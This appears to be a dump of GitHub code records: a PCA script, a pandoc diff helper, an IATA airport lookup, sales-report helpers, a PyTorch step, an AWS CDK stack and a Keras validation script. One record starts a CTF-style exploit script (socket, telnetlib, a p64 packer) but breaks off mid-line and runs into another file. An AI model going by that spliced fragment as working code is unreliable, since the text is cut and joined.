index of the furthest point from the mean\nreduced_df1=reduced_df1.drop(reduced_df1.index[id_outlier]) #remove this outlier\n\ndef f_score_class(df,attri): #group the dataframe by the benign and malignant class labels and then calculates F for any given attribute (attri)\n grouped = df.groupby('class')\n grand_mean=df[attri].mean()\n mean_2=grouped[attri].mean()[2]\n mean_4=grouped[attri].mean()[4]\n var_2 = (grouped[attri].std()[2]) ** 2\n var_4 = (grouped[attri].std()[4]) ** 2\n fscore = ((mean_2 - grand_mean) ** 2 + (mean_4 - grand_mean) ** 2) / (var_2 + var_4)\n return fscore\n\nplt.figure() #open a new figure\n\nplt.subplot(121) #plot the the original PCA result\nplt.plot([1,2,3,4,5,6,7,8,9], pca_var_list, '-o',color='r',alpha=0.7,markeredgewidth=0.0)\nplt.ylabel(\"Fraction of variance explained\")\nplt.xlabel(\"First n components\")\nplt.axhline(y=0.9, color='c', linestyle='--',alpha=0.8)\nax=plt.gca()\nax.set_ylim(0.65,1)\n\ndf2=pd.DataFrame() #df2 is df1 adjusted with F scores\nfor i in df1.columns[1:10]: #skip the 'code' and 'class' columns\n f_score=f_score_class(df1,i)\n df2[i]=df1[i]*f_score\npca.fit(df2)\npca_var_list_2=[]\n\nfor i in range(len(pca.explained_variance_ratio_)):\n if i==0:\n pca_var_list_2.append(pca.explained_variance_ratio_[0])\n else: pca_var_list_2.append(pca_var_list_2[i-1]+pca.explained_variance_ratio_[i])\nplt.subplot(122) #plot the the F-score adjusted PCA result\nplt.plot([1,2,3,4,5,6,7,8,9], pca_var_list_2, '-o',color='r',alpha=0.7,markeredgewidth=0.0)\nplt.ylabel(\"Fraction of variance explained (F score adjusted)\")\nplt.xlabel(\"First n components\")\nplt.axhline(y=0.9, color='c', linestyle='--',alpha=0.8)\nax=plt.gca()\nax.set_ylim(0.65,1)\n\ndf3=pd.DataFrame() #df2 is the result of multiplying the 1st column of df1 by 20\nfor i in df1.columns[1:10]: #copy df1 to df3, skip the 'code' and 'class' columns\n df3[i]=df1[i]\ndf3[df3.columns[0]]*=20\npca.fit(df3)\npca_var_list_3=[]\nfor i in range(len(pca.explained_variance_ratio_)):\n if i==0:\n pca_var_list_3.append(pca.explained_variance_ratio_[0])\n else: pca_var_list_3.append(pca_var_list_3[i-1]+pca.explained_variance_ratio_[i])\n\nplt.figure() #open a new figure\n\nplt.subplot(121) #plot the the original PCA result\nplt.plot([1,2,3,4,5,6,7,8,9], pca_var_list, '-o',color='r',alpha=0.7,markeredgewidth=0.0)\nplt.ylabel(\"Fraction of variance explained\")\nplt.xlabel(\"First n components\")\nplt.axhline(y=0.9, color='c', linestyle='--',alpha=0.8)\nax=plt.gca()\nax.set_ylim(0.65,1)\n\nplt.subplot(122) #plot the modified PCA result\nplt.plot([1,2,3,4,5,6,7,8,9], pca_var_list_3, '-o',color='r',alpha=0.7,markeredgewidth=0.0)\nplt.ylabel(\"Fraction of variance explained (1st column * 20)\")\nplt.xlabel(\"First n components\")\nplt.axhline(y=0.9, color='c', linestyle='--',alpha=0.8)\nax=plt.gca()\nymin=pca_var_list_3[0]\nax.set_ylim(0.65,1)\n\nplt.show()\n","repo_name":"yzhao1849/Projects_in_Courses","sub_path":"2017 summer/Bioinformatics II/Part1 Visualization/3_dimensionality_reduction.py","file_name":"3_dimensionality_reduction.py","file_ext":"py","file_size_in_byte":5972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"990621451","text":"#!/usr/bin/env python3\n\n\"\"\"\nThis script is designed to be run from within vim. It retrieves the filename\n(and complete path) of the current vim document, sets some options, and calls\nthe pandocConvert.py script to complete the conversion. 
It repeats this with\nthe version of the file checked in to git, computes a diff between them, and\ngenerates a .pdf of the result.\n\"\"\"\n\nfrom sys import argv\nfrom os import chdir, path, remove\nimport pandocConvert\nfrom subprocess import check_output, call\n\ntoFormat = 'latexraw'\ntoExtension = '.tex'\nextraOptions = ''\nbookOptions = ''\narticleOptions = ''\naddedFilter = ''\n\n\n# Get old file in git repository to diff with\ncurrentFileName = argv[1].strip('\"')\ncurrentFilePath, currentFileShortName = path.split(currentFileName)\nchdir(currentFilePath)\npandocTempDir = path.expanduser(argv[2])\nif len(argv) > 4:\n gitObject = argv[4] # To identify the old commit to diff with....\nelse:\n gitObject = '' # If empty, uses git cache\ngitPrefix = check_output(['git', 'rev-parse',\n '--show-prefix']).decode('utf-8')[:-2]\noldFileName = path.join(currentFilePath, 'gitdiff.md')\noldFileText = check_output(['git', 'show', gitObject + ':' +\n path.join(gitPrefix, currentFileShortName)])\\\n .decode('utf-8')\n\n# Create .tex file of file in git cache\npandocConvert.writeMessage('Retrieving from git cache...')\npandocConvert.writeFile(oldFileName, oldFileText)\npandocConvert.convertMd(pandocTempDir, oldFileName, toFormat,\n toExtension, extraOptions, bookOptions,\n articleOptions, addedFilter)\nremove(oldFileName) # No longer needed after conversion....\n\n# Create .tex file of current working file\npandocConvert.writeMessage('Creating .tex of working file...')\npandocConvert.convertMd(pandocTempDir, currentFileName, toFormat,\n toExtension, extraOptions, bookOptions,\n articleOptions, addedFilter)\n\n# Create texdiff file\npandocConvert.writeMessage('Creating latexdiff...')\ntempDir = path.expanduser('~/tmp/pandoc')\noldFileBaseName, null = path.splitext(path.basename(oldFileName))\ncurrentFileBaseName, null = path.splitext(currentFileShortName)\noldTexName = path.join(tempDir, oldFileBaseName + '.tex')\nnewTexName = path.join(tempDir, currentFileBaseName + '.tex')\ndiffContents = check_output(['latexdiff', '--type=FONTSTRIKE',\n '--subtype=COLOR', oldTexName,\n newTexName]).decode('utf-8')\npandocConvert.writeFile(newTexName, diffContents)\n\n# Convert to PDF\npandocConvert.writeMessage('Converting to .pdf...')\n# Note: The `False` below is `bookFlag`, which is used in runLatex to determine\n# whether makeidx will be run, and so to set an enviroment flag accordingly.\n# Setting it False here will preserve security, when I don't care whether the\n# index is being produced.\nlatexError = pandocConvert.runLatex(tempDir, currentFileBaseName,\n '-pdf', False)\nif latexError:\n pandocConvert.writeError('Error running LaTeX.')\n exit(1)\nendFile = currentFileBaseName + '.pdf'\nif path.exists('/Applications/Skim.app'):\n call(['open', '-a', '/Applications/Skim.app', '-g',\n path.join(tempDir, endFile)])\nif path.exists('/System/Library/Sounds/Morse.aiff'):\n call(['afplay', '/System/Library/Sounds/Morse.aiff'])\npandocConvert.writeMessage('Conversion complete.')\n\nexit(0)\n","repo_name":"bwhelm/vim-pandoc-mine","sub_path":"pythonx/conversion/markdown-to-LaTeX-diff.py","file_name":"markdown-to-LaTeX-diff.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35986136032","text":"#!/usr/bin/env python3\nimport socket\nimport telnetlib\nimport string\nimport struct\n\nSERVER = True\n\ndef p64(x):\n return struct.pack(\" None:\n \"\"\"Initialize IataCode object\"\"\"\n # Prompt specified by Query 
object\n self.prompt = prompt\n # Reference for obtaining airport code\n self.all_iata_codes = self.load_iata_codes()\n self.iata_code = self.get_code()\n\n def city_choice(self, prompt: str) -> str:\n \"\"\"Gets user's input\"\"\"\n # Standardizes input\n user_input = input(f\"\\n{prompt}\\n\").capitalize()\n return user_input\n\n def load_iata_codes(self) -> dict:\n \"\"\"Load all airport cities from json file\"\"\"\n with open(\"IATA-codes.json\", \"r\") as data_file:\n raw_json = data_file.readline()\n code_repo = json.loads(raw_json)\n return code_repo\n\n def correct_spelling(self, city: str) -> str:\n \"\"\"Checks if city is in Json list\"\"\"\n return self.all_iata_codes[city][1]\n\n def multiple_options(self, city: str) -> dict:\n \"\"\"Creates dictionary of possible cities based on spelling\"\"\"\n options = {}\n count = 1\n for cities in self.all_iata_codes:\n if (len(city) < 4) and (city == cities[:len(city)]):\n options[count] = [cities, self.all_iata_codes[cities]]\n count += 1\n else:\n if cities[:4] == city[:4]:\n options[count] = [cities, self.all_iata_codes[cities]]\n count += 1\n return options\n\n def display_options(self, options: dict) -> None:\n \"\"\"Prints city options to the terminal\"\"\"\n try:\n if options == {}:\n os.system('clear')\n print(\"Couldn't find any results\")\n return self.get_code()\n else:\n print(\"Did you mean one of the following options?\\n\")\n for choices in options:\n city = options[choices][0]\n country = options[choices][1][0]\n print(f\"{choices} : {city}, {country}\")\n except:\n return self.get_code()\n\n def choice(self, options: dict) -> str:\n \"\"\"Gets User to choose city\"\"\"\n user_input = input(\"\"\"\\nChoose one of the following options\nInput reference number on the left\nOr hit enter to search again\\n\"\"\")\n try:\n return options[int(user_input)][1][1]\n except:\n print(\"That wasn't an option\")\n return self.get_code()\n\n def get_code(self) -> str:\n \"\"\"Returns airport code for city chosen by User\"\"\"\n city = self.city_choice(self.prompt)\n try:\n return self.correct_spelling(city)\n except:\n options = self.multiple_options(city)\n self.display_options(options)\n return self.choice(options)\n","repo_name":"seanremenyi/Flight-Search","sub_path":"src/IataCode.py","file_name":"IataCode.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18461173526","text":"import datetime\nimport requests\nfrom dateutil.relativedelta import relativedelta\nimport calendar\nimport pandas as pd\n\n\ndef get_dates(num):\n lst = []\n\n for i in range(num, 1, 1):\n d = datetime.date.today() + datetime.timedelta(days=i)\n lst.append(d.strftime(\"%m/%d/%Y 00:00:00\"))\n return lst\n\n\ndef get_months_dates(startmonth, length, month, year):\n # This returns list of dates of specified lengths of months.\n target = datetime.date(year, month, 1)\n lst = []\n\n for h in range(startmonth, startmonth + length, 1):\n current = target + relativedelta(months=h)\n for i in range(1, calendar.monthlen(current.year, current.month) + 1):\n d = datetime.date(current.year, current.month, i)\n lst.append(d.strftime(\"%m/%d/%Y 00:00:00\"))\n return lst\n\n\ndef get_dates_from_to(startday, endday):\n # If you want to get date 30 days ago --> start = -30\n # If you want to get date until today --> 0, yesterday --> -1, two days ago --> -2.. 
so on\n end = endday + 2\n lst = []\n\n for i in range(startday, end, 1):\n for h in range(7, 19):\n d = datetime.date.today() + datetime.timedelta(days=i)\n lst.append(d.strftime(\"%m/%d/%Y {}:00:00\").format(h))\n return lst\n\n\ndef get_recent_week_nums():\n weeks = []\n for i in range(1, 36, 7):\n w = datetime.date.today() + datetime.timedelta(days=i)\n week = w.strftime(\"%V\")\n weeks.append(week)\n return weeks\n\n\ndef get_accesstoken(client_id, client_secret, refresh_token, client_version, token_url):\n data = {\n 'grant_type': 'refresh_token',\n 'client_id': client_id,\n 'client_secret': client_secret,\n 'refresh_token': refresh_token,\n 'client_version': client_version\n }\n resp = requests.post(url=token_url,\n json=data)\n resp_json = resp.json()\n return resp_json['access_token']\n\n\ndef get_summary_report(token, startdate, enddate):\n arr = {\n 'searchCriteria': {\n 'startDate': startdate,\n 'endDate': enddate,\n 'includedReports': [102]\n }\n }\n result = requests.post(url='https://mapi-eu.talech.com/reports/receiptssummaryreport',\n json=arr,\n headers=token)\n items = result.json()\n salesdata = json_get_sales_count(items)\n return salesdata\n\n\ndef json_get_fooditem_keys(obj):\n \"\"\"Recursively fetch values from nested JSON and extract item name and key\"\"\"\n arr = {}\n itemname = 'No name'\n itemkey = 'no-key'\n itemlabel = 'no-label'\n category = 'no-category'\n\n def extract(obj, arr, itemname, itemkey, itemlabel, category):\n \"\"\"Recursively search for values of key in JSON tree.\"\"\"\n\n def get_label(obj):\n \"\"\"This labels identify the difference of items which hold same item name\"\"\"\n l = 'no-label'\n for item in obj:\n for k, v in item.items():\n if k == 'label':\n if v != 'Tall' and v != 'Reg' \\\n and v != 'To Go' and v != 'Sit In' \\\n and v != 'Heated' and v != 'Not Heated':\n l = v\n else:\n pass\n return l\n\n if isinstance(obj, dict):\n for k, v in obj.items():\n if k == 'items':\n extract(v, arr, itemname, itemkey, itemlabel, category)\n elif k == 'productVariants':\n extract(v, arr, itemname, itemkey, itemlabel, category)\n elif k == 'modifierOptions':\n itemlabel = get_label(v)\n elif k == 'skuNumber':\n itemkey = v\n elif k == 'name':\n itemname = v\n elif k == 'categoryType':\n category = v\n arr[itemkey] = {'name': itemname, 'label': itemlabel, 'category': category}\n\n elif isinstance(obj, list):\n for item in obj:\n extract(item, arr, itemname, itemkey, itemlabel, category)\n return arr\n\n def bundle_same_items(obj, category):\n \"\"\"extract keys of items which belong to specific category\"\"\"\n arr = {}\n itemkey = None\n itemname = None\n itemlabel = None\n\n def get_similar_string(str1, str2):\n \"\"\"if str2 contains str1, return str2.\n This return str2 even words' order doesn't match\"\"\"\n count = 0\n words = str1.split(' ')\n for w in words:\n if w in str2:\n count += 1\n if count == len(words):\n return str2\n else:\n return False\n\n for key, val in obj.items():\n for k, v in val.items():\n if k == 'category':\n if v == category:\n itemkey = key\n else:\n continue\n elif k == 'name':\n if v == 'Soup & Sandwich':\n \"\"\"These items cannot be identified its sandwich name by its name.\n Instead, we need to use labels for that\"\"\"\n continue\n else:\n itemname = v\n elif k == 'label':\n if v != 'no-label':\n itemlabel = v\n else:\n pass\n\n if itemname and itemkey:\n try:\n for key, value in arr.items():\n name = get_similar_string(itemname, key)\n if name:\n k = name\n break\n arr[k].append(itemkey)\n except:\n 
arr[itemname] = [itemkey]\n\n elif itemlabel and itemkey:\n try:\n for key, value in arr.items():\n name = get_similar_string(itemlabel, key)\n if name:\n k = name\n break\n arr[k].append(itemkey)\n except:\n arr[itemlabel] = [itemkey]\n\n itemkey = None\n itemname = None\n itemlabel = None\n\n return arr\n\n values = extract(obj, arr, itemname, itemkey, itemlabel, category)\n lunch = bundle_same_items(values, 'LUNCH')\n baked = bundle_same_items(values, 'BAKED GOODS')\n breakfast = bundle_same_items(values, 'BREAKFAST')\n bundled = {'LUNCH': lunch, 'BAKED GOODS': baked, 'BREAKFAST': breakfast}\n return bundled\n\n\ndef json_get_sales_count(obj):\n \"\"\"Recursively fetch values from nested JSON.\"\"\"\n arr = {'BAKED GOODS': {}, 'BREAKFAST': {}, 'LUNCH': {}}\n itemkey = None\n itemvalue = None\n categoryname = None\n\n def extract(obj, arr, itemkey, itemvalue, categoryname):\n \"\"\"Recursively search for values of key in JSON tree.\"\"\"\n if isinstance(obj, dict):\n for k, v in obj.items():\n if isinstance(v, (dict, list)):\n extract(v, arr, itemkey, itemvalue, categoryname)\n elif k == 'item':\n itemkey = v\n elif k == 'soldQuantity':\n itemvalue = v\n elif k == 'categoryName':\n if v == 'LUNCH' or v == 'BREAKFAST' or v == 'BAKED GOODS':\n categoryname = v\n\n if categoryname and itemkey and itemvalue:\n arr[categoryname][itemkey] = itemvalue\n itemkey = None\n itemvalue = None\n categoryname = None\n\n elif isinstance(obj, list):\n for item in obj:\n extract(item, arr, itemkey, itemvalue, categoryname)\n return arr\n\n values = extract(obj, arr, itemkey, itemvalue, categoryname)\n return values\n\n\ndef merge_data(salesdata, itemdata):\n arr = {}\n\n for date, dailysale in salesdata.items():\n \"\"\"Create empty ditionaries for each date which contain sorted item keys\"\"\"\n arr[date] = {}\n for category, items in itemdata.items():\n arr[date][category] = {}\n for itemname, itemkeys in items.items():\n arr[date][category][itemname] = {}\n mainkey = None\n subkeys = []\n for key in itemkeys:\n if mainkey is None or len(mainkey) > len(key):\n mainkey = key\n else:\n subkeys.append(key)\n\n if mainkey:\n arr[date][category][itemname][mainkey] = subkeys\n arr[date][category][itemname]['sold'] = 0\n\n for soldcategory, solditems in dailysale.items():\n \"\"\"Find the matching keys in the array which was created earlier,\n and save sales quantity in the array\"\"\"\n for soldkey, soldnum in solditems.items():\n for soldname, soldkeys in arr[date][soldcategory].items():\n for parentkey, subkeys in soldkeys.items():\n if parentkey == soldkey:\n arr[date][soldcategory][soldname]['sold'] += soldnum\n elif isinstance(subkeys, list):\n for key in subkeys:\n if key == soldkey:\n arr[date][soldcategory][soldname]['sold'] += soldnum\n\n return arr\n\n\ndef modify_into_training_data(data):\n lst = []\n for dt, soldproducts in data.items():\n date = pd.to_datetime(dt).strftime('%m/%d/%Y')\n category = None\n name = None\n key = None\n sales = None\n for ctg, products in soldproducts.items():\n category = ctg\n for pdname, pdinfo in products.items():\n name = pdname\n for k, v in pdinfo.items():\n if k == \"sold\":\n sales = v\n elif isinstance(v, list):\n key = k\n if date and category and name and key and sales:\n lst.append({\"name\": name,\n \"key\": key,\n \"date\": date,\n \"category\": category,\n \"sales\": sales})\n\n return 
lst","repo_name":"miyazakimaiko/Correct-Order","sub_path":"pkg/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":10573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70335443452","text":"from model.usuarioModel import Usuario\n\nclass AdicionarUsuario:\n @staticmethod\n def post(nome, idade, tipoDeUsuario):\n usuario = Usuario(nome, idade, tipoDeUsuario)\n usuario.cadastrarUsuario()\n\n #pegar\nclass AtualizarUsuario:\n @staticmethod\n def get(id):\n usuario = Usuario.listarUsuarioPorId(id)\n usuario.alterarUsuario()\n print(usuario)\n\nclass DevolverUsuario:\n @staticmethod\n def get(id):\n usuario = Usuario.listarUsuarioPorId(id)\n usuario.devolver()\n print(usuario)\n\nclass ApagarUsuario:\n @staticmethod\n def get(id):\n usuario = Usuario.listarUsuarioPorId(id)\n usuario.excluirUsuario()\n\nclass ListarUsuario:\n @staticmethod\n def get():\n print(Usuario.listarUsuarios())\n\nclass BuscarUsuario:\n @staticmethod\n def get(id):\n print(Usuario.listarUsuarioPorId(id))\n","repo_name":"DanielOlint0/Biblioteca","sub_path":"controller/usuarioController.py","file_name":"usuarioController.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40939453614","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom define_network import Net\n\nif __name__ == '__main__':\n _input = torch.randn(1, 1, 32, 32)\n target = torch.randn((1, 10))\n criterion = nn.MSELoss()\n\n net = Net()\n lr = 0.01\n optimizer = optim.SGD(net.parameters(), lr=lr)\n\n optimizer.zero_grad()\n output = net(_input)\n loss = criterion(output, target)\n loss.backward()\n optimizer.step()\n","repo_name":"wakame1367/pytorch_tutorial","sub_path":"Update_the_weights.py","file_name":"Update_the_weights.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33142230369","text":"import os\n\nfrom aws_cdk import (\n aws_dynamodb as dynamodb,\n aws_iam as iam,\n core as cdk\n)\nfrom aws_cdk.aws_dynamodb import StreamViewType\nfrom aws_cdk.aws_iam import PolicyStatement, Effect, AnyPrincipal\nfrom aws_cdk.aws_s3 import Bucket, BucketAccessControl, CorsRule, HttpMethods\nfrom aws_cdk.aws_s3_deployment import BucketDeployment, Source\nfrom aws_cdk.core import RemovalPolicy\nfrom cdk_chalice import Chalice\n\n\nclass WebApi(cdk.Stack):\n\n _API_HANDLER_LAMBDA_MEMORY_SIZE_1024 = 1024\n _API_HANDLER_LAMBDA_MEMORY_SIZE_128 = 128\n _API_HANDLER_LAMBDA_MEMORY_SIZE_256 = 256\n _API_HANDLER_LAMBDA_MEMORY_SIZE_512 = 512\n\n _API_HANDLER_LAMBDA_TIMEOUT_SHORT_SECONDS = 5\n _API_HANDLER_LAMBDA_TIMEOUT_SECONDS = 10\n\n def __init__(self, scope: cdk.Construct, id: str, **kwargs) -> None:\n super().__init__(scope, id, **kwargs)\n\n #\n # DynamoDb\n #\n partition_key = dynamodb.Attribute(name='pk', type=dynamodb.AttributeType.STRING)\n sort_key = dynamodb.Attribute(name=\"sk\", type=dynamodb.AttributeType.STRING)\n gsi1pk = dynamodb.Attribute(name=\"gsi1pk\", type=dynamodb.AttributeType.STRING)\n gsi1sk = dynamodb.Attribute(name=\"gsi1sk\", type=dynamodb.AttributeType.STRING)\n\n self.dynamodb_table = dynamodb.Table(\n self, 'WebApiTable',\n partition_key=partition_key,\n sort_key=sort_key,\n table_name=\"PyAwsV1\",\n removal_policy=cdk.RemovalPolicy.DESTROY,\n stream=StreamViewType.NEW_AND_OLD_IMAGES)\n cdk.CfnOutput(self, 'DynamoDbTableName', 
value=self.dynamodb_table.table_name)\n self.dynamodb_table.add_global_secondary_index(index_name=\"gsi1\", partition_key=gsi1pk, sort_key=gsi1sk)\n\n #\n # Role for lambda execution with access to dynamodb\n #\n lambda_service_principal = iam.ServicePrincipal('lambda.amazonaws.com')\n cloudwatch_logs_policy = iam.ManagedPolicy.from_aws_managed_policy_name(\n 'service-role/AWSLambdaBasicExecutionRole')\n s3_full_access_policy = iam.ManagedPolicy.from_aws_managed_policy_name(\n 'AmazonS3FullAccess')\n\n self.api_handler_iam_role = iam.Role(\n self, 'ApiHandlerLambdaRole', assumed_by=lambda_service_principal,\n managed_policies=[cloudwatch_logs_policy, s3_full_access_policy])\n self.dynamodb_table.grant_read_write_data(self.api_handler_iam_role)\n self.dynamodb_table.grant(self.api_handler_iam_role, 'dynamodb:DescribeTable')\n self.api_handler_iam_role.add_to_policy(PolicyStatement(\n resources=[\"*\"],\n actions=[\"ssm:GetParameter\", \"secretsmanager:GetSecretValue\"]\n ))\n\n #\n # Role for lambda that performs periodic task execution\n #\n self.periodic_task_iam_role = iam.Role(\n self, 'PeriodicTaskLambdaRole', assumed_by=lambda_service_principal,\n managed_policies=[cloudwatch_logs_policy])\n self.periodic_task_iam_role.add_to_policy(PolicyStatement(\n resources=[\"*\"],\n actions=[\"cloudwatch:GetMetricStatistics\", \"SNS:Publish\", \"ssm:GetParameter\"]\n ))\n self.dynamodb_table.grant_read_write_data(self.periodic_task_iam_role)\n self.dynamodb_table.grant(self.periodic_task_iam_role, 'dynamodb:DescribeTable')\n\n #\n # Role for lambda used for dynamodb stream processing\n #\n self.on_table_update_iam_role = iam.Role(\n self, 'OnTableUpdateLambdaRole', assumed_by=lambda_service_principal,\n managed_policies=[cloudwatch_logs_policy])\n self.on_table_update_iam_role.add_to_policy(PolicyStatement(\n resources=[\"*\"],\n actions=[\"ses:SendEmail\", \"logs:CreateLogGroup\", \"logs:CreateLogStream\", \"logs:PutLogEvents\",\n \"dynamodb:ListStreams\", \"dynamodb:GetShardIterator\", \"dynamodb:GetRecords\",\n \"dynamodb:DescribeStream\", \"dynamodb:DescribeTable\",\n \"dynamodb:BatchGetItem\",\n \"dynamodb:Query\",\n \"dynamodb:GetItem\",\n \"dynamodb:Scan\",\n \"dynamodb:BatchWriteItem\",\n \"dynamodb:PutItem\",\n \"dynamodb:UpdateItem\",\n \"dynamodb:DeleteItem\",\n \"ssm:GetParameter\"]\n ))\n\n #\n # Chalice config, check details for more details lambda config inside create_chalice_stage_config\n #\n web_api_source_dir = os.path.join(os.path.dirname(__file__), os.pardir,\n os.pardir, 'web-api')\n chalice_stage_config = self.create_chalice_stage_config()\n self.chalice = Chalice(self, 'WebApi', source_dir=web_api_source_dir,\n stage_config=chalice_stage_config)\n\n #\n # Users assets\n # Cloudflare manual setup required: add CNAME to DNS i.e. 
for in me-south-1 region:\n # name: img value: .s3.me-south-1.amazonaws.com\n #\n pyaws_domain = os.environ['PYAWS_CLI_DOMAIN']\n pyaws_image_subdomain = os.environ['PYAWS_CLI_IMAGE_SUBDOMAIN']\n pyaws_img_domain = f\"{pyaws_image_subdomain}.{pyaws_domain}\"\n img_bucket = Bucket(self, pyaws_img_domain,\n bucket_name=pyaws_img_domain,\n public_read_access=False,\n removal_policy=RemovalPolicy.DESTROY,\n access_control=BucketAccessControl.AUTHENTICATED_READ,\n cors=[CorsRule(allowed_methods=[HttpMethods.GET, HttpMethods.POST],\n allowed_headers=[],\n allowed_origins=[f\"https://{pyaws_domain}\", \"http://localhost:3000\"])]\n )\n\n img_bucket.add_to_resource_policy(permission=PolicyStatement(\n sid=f\"policy.cloudflare.sid.{pyaws_img_domain}\",\n effect=Effect.ALLOW,\n principals=[AnyPrincipal()],\n actions=[\"s3:GetObject\"],\n resources=[f\"arn:aws:s3:::{pyaws_img_domain}/*\"],\n conditions={\"IpAddress\": {\"aws:SourceIp\": [\n \"103.21.244.0/22\",\n \"103.22.200.0/22\",\n \"103.31.4.0/22\",\n \"108.162.192.0/18\",\n \"131.0.72.0/22\",\n \"141.101.64.0/18\",\n \"162.158.0.0/15\",\n \"172.64.0.0/13\",\n \"173.245.48.0/20\",\n \"188.114.96.0/20\",\n \"190.93.240.0/20\",\n \"197.234.240.0/22\",\n \"198.41.128.0/17\",\n \"199.27.128.0/21\",\n \"104.16.0.0/13\",\n \"104.24.0.0/14\"\n ]\n }}\n ))\n\n BucketDeployment(self, id=\"assetsDeployment\",\n sources=[Source.asset('./assets')],\n destination_bucket=img_bucket)\n\n\n def create_chalice_stage_config(self):\n \"\"\"Chalice config for Aws Gateway Stage and Lambda provisioning\n\n This is used by aws_cdk construct to generate whole stack from chalice app.\n Note: we use ipwhitelist.json for access control\n Note: various env variables injected into lambda and memory config\n \"\"\"\n PYAWS_CLI_DOMAIN = os.environ['PYAWS_CLI_DOMAIN']\n PYAWS_CLI_AWS_SNS_EMAIL_REGION = os.environ['PYAWS_CLI_AWS_SNS_EMAIL_REGION']\n PYAWS_CLI_IMAGE_SUBDOMAIN = os.environ['PYAWS_CLI_IMAGE_SUBDOMAIN']\n\n chalice_stage_config = {\n \"environment_variables\": {\n 'DYNAMODB_TABLE_NAME': self.dynamodb_table.table_name,\n \"DYNAMODB_STREAM_ARN\": self.dynamodb_table.table_stream_arn,\n \"PYAWS_CLI_DOMAIN\" : PYAWS_CLI_DOMAIN,\n \"PYAWS_CLI_AWS_SNS_EMAIL_REGION\": PYAWS_CLI_AWS_SNS_EMAIL_REGION,\n \"PYAWS_CLI_IMAGE_SUBDOMAIN\": PYAWS_CLI_IMAGE_SUBDOMAIN\n },\n 'api_gateway_stage': 'v1',\n \"api_gateway_policy_file\": \"ipwhitelist.json\",\n 'lambda_functions': {\n 'lambda_authorizer': {\n 'lambda_memory_size': WebApi._API_HANDLER_LAMBDA_MEMORY_SIZE_1024,\n 'lambda_timeout': WebApi._API_HANDLER_LAMBDA_TIMEOUT_SECONDS,\n 'manage_iam_role': False,\n 'iam_role_arn': self.api_handler_iam_role.role_arn,\n 'reserved_concurrency': 10,\n 'environment_variables': {\n },\n },\n 'api_handler': {\n 'manage_iam_role': False,\n 'iam_role_arn': self.api_handler_iam_role.role_arn,\n 'environment_variables': {\n },\n 'lambda_memory_size': WebApi._API_HANDLER_LAMBDA_MEMORY_SIZE_1024,\n 'lambda_timeout': WebApi._API_HANDLER_LAMBDA_TIMEOUT_SHORT_SECONDS,\n 'reserved_concurrency': 10\n },\n 'periodic_task': {\n 'manage_iam_role': False,\n 'iam_role_arn': self.periodic_task_iam_role.role_arn,\n 'lambda_memory_size': WebApi._API_HANDLER_LAMBDA_MEMORY_SIZE_128,\n 'lambda_timeout': WebApi._API_HANDLER_LAMBDA_TIMEOUT_SHORT_SECONDS,\n 'reserved_concurrency': 2\n },\n 'on_table_update': {\n 'manage_iam_role': False,\n 'iam_role_arn': self.on_table_update_iam_role.role_arn,\n 'lambda_memory_size': WebApi._API_HANDLER_LAMBDA_MEMORY_SIZE_128,\n 'lambda_timeout': 
WebApi._API_HANDLER_LAMBDA_TIMEOUT_SHORT_SECONDS,\n 'reserved_concurrency': 5\n }\n }\n }\n\n return chalice_stage_config\n","repo_name":"stokilo/slawomirstec.com","sub_path":"infra/stacks/web_api.py","file_name":"web_api.py","file_ext":"py","file_size_in_byte":9898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22225120988","text":"import numpy as np\nimport cv2\n\nfrom dataset_loader import DatasetLoader\n\nfrom constants import *\n\nfrom keras.models import load_model\nfrom quiver_engine.server import launch\n\n# Load dataset\n# Comment/uncomment to select dataset to use\ndataset = DatasetLoader()\n\n# CK Extended\ndataset.ck_extended_load_from_save()\nclasses = CK_EXTENDED_EMOTIONS\nnum_classes = len(classes)\n\nx_train, x_test = dataset.images, dataset.images_test\ny_train, y_test = dataset.labels, dataset.labels_test\n\nx_train = x_train.astype('float32')\nx_test = x_test.astype('float32')\n\n# Load model\nmodel = load_model(MODELS_PATH + 'model_ck_extended_inception_v3_1.h5')\nprint ('[+] Model loaded')\n\ncount = 0\nresult = model.predict(x_test)\nfor i in range(len(result)):\t\n\tif (classes[np.argmax(result[i])] == classes[np.argmax(y_test[i])]):\n\t\tcount += 1\n\nprint ('[+] Validation accuracy: ', count / len(result))\n","repo_name":"jorgeribeiro/filtros-ativacao-cnn","sub_path":"validate_model.py","file_name":"validate_model.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10007253899","text":"# -*- coding: utf-8 -*-\n\n\n# Standard library\nimport logging\nfrom pathlib import Path\nimport os\n\n# 3rd party packages\n# import click\n\n# Local source\nfrom src.data.stock_io import read_time_series, write_time_series\n\n\n# @click.command()\n# @click.argument('input_file', type=click.Path(exists=True))\n# @click.argument('output_file', type=click.Path())\ndef main(input_file, output_file):\n \"\"\" Runs data processing scripts to turn raw data from (../raw) into\n cleaned data ready to be analyzed (saved in ../processed).\n \"\"\"\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')\n raw_data = read_time_series(input_file)\n write_time_series(raw_data, output_file)\n\n\nif __name__ == '__main__':\n log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n logging.basicConfig(level=logging.INFO, format=log_fmt)\n\n # Often useful for finding various files\n project_dir = Path(__file__).resolve().parents[2]\n\n raw_data_path = os.path.join(project_dir, \"data\", \"raw\", \"AAPL.csv\")\n processed_data_path = os.path.join(project_dir, \"data\", \"processed\", \"AAPL.csv\")\n main(raw_data_path, 